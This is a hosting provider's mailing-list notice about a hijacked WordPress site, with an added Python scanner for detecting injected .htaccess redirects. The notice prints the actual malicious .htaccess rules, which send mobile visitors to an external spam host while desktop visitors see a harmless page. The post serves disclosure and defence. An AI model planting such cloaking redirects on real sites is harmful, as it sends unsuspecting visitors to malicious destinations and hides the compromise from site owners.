Author: Andy Smith
Date:  
To: users
Subject: [bitfolk] Security incident: Wordpress install compromised and turned into redirect to porn site

gpg: Signature made Tue Mar 5 19:23:45 2013 UTC
gpg: using DSA key 2099B64CBF15490B
gpg: Good signature from "Andy Smith <andy@strugglers.net>" [unknown]
gpg: aka "Andrew James Smith <andy@strugglers.net>" [unknown]
gpg: aka "Andy Smith (UKUUG) <andy.smith@ukuug.org>" [unknown]
gpg: aka "Andy Smith (BitFolk Ltd.) <andy@bitfolk.com>" [unknown]
gpg: aka "Andy Smith (Linux User Groups UK) <andy@lug.org.uk>" [unknown]
gpg: aka "Andy Smith (Cernio Technology Cooperative) <andy.smith@cernio.com>" [unknown]
Hi,

Yesterday we received numerous abuse reports regarding a web site
hosted at BitFolk being mentioned in an email spam run. The spam
email looked like this:

    http://pastie.org/private/vjxjhjkpfxqby0fkrv87oq


(http://[elided]/wp-content/themes/mantra/uploads/wps.php?v20120226
being the link that was hosted at BitFolk)

The link, when visited from a conventional browser, was a harmless
redirect to microsoft.com; however, when visited from a mobile
browser it redirected to a porn site.

The customer was contacted and their port 80 immediately firewalled
off.

Later the customer advised that they were unwilling to spend the
time to discover exactly how Wordpress had been compromised,
preferring instead to completely remove it.

The following .htaccess file was found in several places throughout
the wp-content directory:

    RewriteEngine On
    RewriteCond %{HTTP:X-WAP-PROFILE} !^$ [OR]
    RewriteCond %{HTTP_USER_AGENT} ^.*(Alcatel|Asus|Android|BlackBerry|Ericsson|Fly|Huawei|i-mate|iPAQ|iPhone|iPod|LG-|LGE-|MDS_|MOT-|Nokia|Palm|Panasonic|Pantech|Philips|Sagem|Samsung|Sharp|SIE-|Symbian|Vodafone|Voxtel|WebOS|Windows\s+CE|ZTE-|Zune).*$ [NC,OR]
    RewriteCond %{HTTP_ACCEPT} application/vnd.wap.xhtml\+xml [NC,OR]
    RewriteCond %{HTTP_ACCEPT} text/vnd.wap.wml [NC]
    RewriteRule ^(.*) http://crzyluxtds.in/go.php?sid=1 [L,R=302]
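The rules above only fire for clients that look mobile (WAP headers or a
mobile User-Agent) and then send them off-site with a 302, which is why a
desktop check of the URL looked harmless. As an added example (not part of
Andy's post or BitFolk's tooling), here is a small Python scanner that walks a
wp-content tree, reads every .htaccess it finds, and flags RewriteRules whose
target is an absolute URL to a host outside the site, noting when the
preceding RewriteConds key on mobile or WAP clients. The sample .htaccess
bodies and the hostname `malicious.example` are constructed placeholders.

```python
import re
from pathlib import Path
from urllib.parse import urlparse

# Constructed sample modelled on the injected .htaccess in the post; the
# destination host is a placeholder, not the real one.
SAMPLE_HTACCESS = """\
RewriteEngine On
RewriteCond %{HTTP:X-WAP-PROFILE} !^$ [OR]
RewriteCond %{HTTP_USER_AGENT} ^.*(Android|BlackBerry|iPhone|iPod|Nokia|Symbian).*$ [NC,OR]
RewriteCond %{HTTP_ACCEPT} text/vnd.wap.wml [NC]
RewriteRule ^(.*) http://malicious.example/go.php?sid=1 [L,R=302]
"""

# Constructed benign sample: the usual WordPress front-controller rules.
BENIGN_HTACCESS = """\
# BEGIN WordPress
RewriteEngine On
RewriteBase /
RewriteRule ^index\\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
# END WordPress
"""

# Substrings that indicate a condition is selecting mobile/WAP clients.
MOBILE_HINTS = ("x-wap-profile", "vnd.wap", "android", "iphone", "ipod",
                "blackberry", "nokia", "symbian", "webos", "windows\\s+ce")

ABSOLUTE_URL = re.compile(r"^(?:https?:)?//", re.IGNORECASE)


def _parse_directive(line):
    """Return (directive, args) for one .htaccess line, or None for blanks/comments."""
    stripped = line.strip()
    if not stripped or stripped.startswith("#"):
        return None
    parts = stripped.split(None, 1)
    return parts[0].lower(), (parts[1] if len(parts) > 1 else "")


def analyse_htaccess(text, site_hosts=()):
    """Flag RewriteRules that redirect to a host not in site_hosts.

    Apache applies RewriteCond lines only to the RewriteRule that follows
    them, so conditions are collected and consumed per rule. Each finding is
    a dict with the 1-based line number, the rule text and a reason string.
    """
    findings = []
    pending_conds = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        parsed = _parse_directive(raw)
        if parsed is None:
            continue
        directive, args = parsed
        if directive == "rewritecond":
            pending_conds.append(args)
            continue
        if directive != "rewriterule":
            continue
        conds, pending_conds = pending_conds, []
        fields = args.split()
        target = fields[1] if len(fields) > 1 else ""
        if not ABSOLUTE_URL.match(target):
            continue  # internal rewrite or passthrough ("-"), not a redirect
        url = target if target.lower().startswith("http") else "http:" + target
        host = urlparse(url).hostname or ""
        if host in site_hosts:
            continue
        reason = "redirect to off-site host %s" % host
        cond_text = " ".join(conds).lower()
        if any(hint in cond_text for hint in MOBILE_HINTS):
            reason += "; gated on mobile/WAP client (cloaking pattern)"
        findings.append({"line": lineno, "rule": raw.strip(), "reason": reason})
    return findings


def scan_tree(root, site_hosts=()):
    """Walk a directory (e.g. wp-content) and analyse every .htaccess found."""
    report = {}
    for path in Path(root).rglob(".htaccess"):
        findings = analyse_htaccess(path.read_text(errors="replace"), site_hosts)
        if findings:
            report[str(path)] = findings
    return report


if __name__ == "__main__":
    for name, body in (("injected", SAMPLE_HTACCESS), ("benign", BENIGN_HTACCESS)):
        for f in analyse_htaccess(body, site_hosts=("www.example.org",)):
            print("%s line %d: %s\n    %s" % (name, f["line"], f["reason"], f["rule"]))
```

Run `scan_tree("/path/to/wp-content", site_hosts=("www.yoursite",))` against
a copy of the document root; any hit outside the site's own hostnames is worth
a look, and a hit carrying the mobile/WAP gating note matches the behaviour
described in this post. Keep hashes of legitimate .htaccess files so a rerun
can also catch ones that appear where WordPress never writes them.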


The customer says that no plugins were installed, so it must have
been a base Wordpress install that was compromised (may have been
out of date or installed incorrectly).

Cheers,
Andy

About this email:
https://tools.bitfolk.com/wiki/Security_incident_postings

--
http://bitfolk.com/ -- No-nonsense VPS hosting